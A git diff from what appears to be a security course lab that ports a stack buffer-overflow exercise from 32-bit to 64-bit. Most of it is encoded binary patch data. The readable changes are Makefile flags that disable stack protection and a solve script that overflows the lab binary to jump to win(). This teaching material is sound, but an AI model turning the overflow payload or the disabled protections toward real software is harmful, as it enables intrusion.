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 MjgVsyK{LGn0begF82|tP diff --git a/labs/lab-12/tasks/rip-my-buffers-off/solution/Makefile b/labs/lab-12/tasks/rip-my-buffers-off/solution/Makefile index ce9f68c0d..9484d5d56 100644 --- a/labs/lab-12/tasks/rip-my-buffers-off/solution/Makefile +++ b/labs/lab-12/tasks/rip-my-buffers-off/solution/Makefile @@ -1,6 +1,6 @@ CC = gcc -CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector -LDFLAGS = -no-pie -m32 +CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector +LDFLAGS = -no-pie -m64 SRC_DIR = . TARGET = buff-ovf2 OBJ = buff-ovf2.o @@ -8,10 +8,10 @@ OBJ = buff-ovf2.o all: $(TARGET) obfuscator: $(SRC_DIR)/obfuscator.c - $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall + $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall deobfuscator: $(SRC_DIR)/deobfuscator.c - $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall + $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall $(TARGET): $(OBJ) $(CC) $(LDFLAGS) $(OBJ) -o $(TARGET) diff --git a/labs/lab-12/tasks/rip-my-buffers-off/solution/exploit.sh b/labs/lab-12/tasks/rip-my-buffers-off/solution/exploit.sh old mode 100755 new mode 100644 index fb26faf4c..5afa5b509 --- a/labs/lab-12/tasks/rip-my-buffers-off/solution/exploit.sh +++ b/labs/lab-12/tasks/rip-my-buffers-off/solution/exploit.sh @@ -3,8 +3,9 @@ # TODO set the correct padding length and values of addresses and stack variables -padding_length="41" -address="\xd6\x91\x04\x08" +padding_length="56" +# 64-bit little-endian address of win() (0x4011f6) +address="\xf6\x11\x40\x00\x00\x00\x00\x00" # build the payload diff --git a/labs/lab-12/tasks/rip-my-buffers-off/solution/solve.sh b/labs/lab-12/tasks/rip-my-buffers-off/solution/solve.sh index 9aa0bef95..95daf9b81 100755 --- a/labs/lab-12/tasks/rip-my-buffers-off/solution/solve.sh +++ b/labs/lab-12/tasks/rip-my-buffers-off/solution/solve.sh @@ -1,3 +1,3 @@ #!/bin/bash -python3 -c 'import sys; sys.stdout.buffer.write(b"A"*41 + b"\xd6\x91\x04\x08")' | ../support/buff-ovf2 +python3 -c 'import sys; sys.stdout.buffer.write(b"A"*56 + b"\xf6\x11\x40\x00\x00\x00\x00\x00")' | ../support/buff-ovf2 diff --git a/labs/lab-12/tasks/rip-my-buffers-off/support/buff-ovf2 b/labs/lab-12/tasks/rip-my-buffers-off/support/buff-ovf2 index eb708ec0e34288983520c736b78795603a8c0a4d..de3899633bf63ec4853a0b0b4a784b6f7f965d27 100755 GIT binary patch literal 19792 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 literal 18468 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 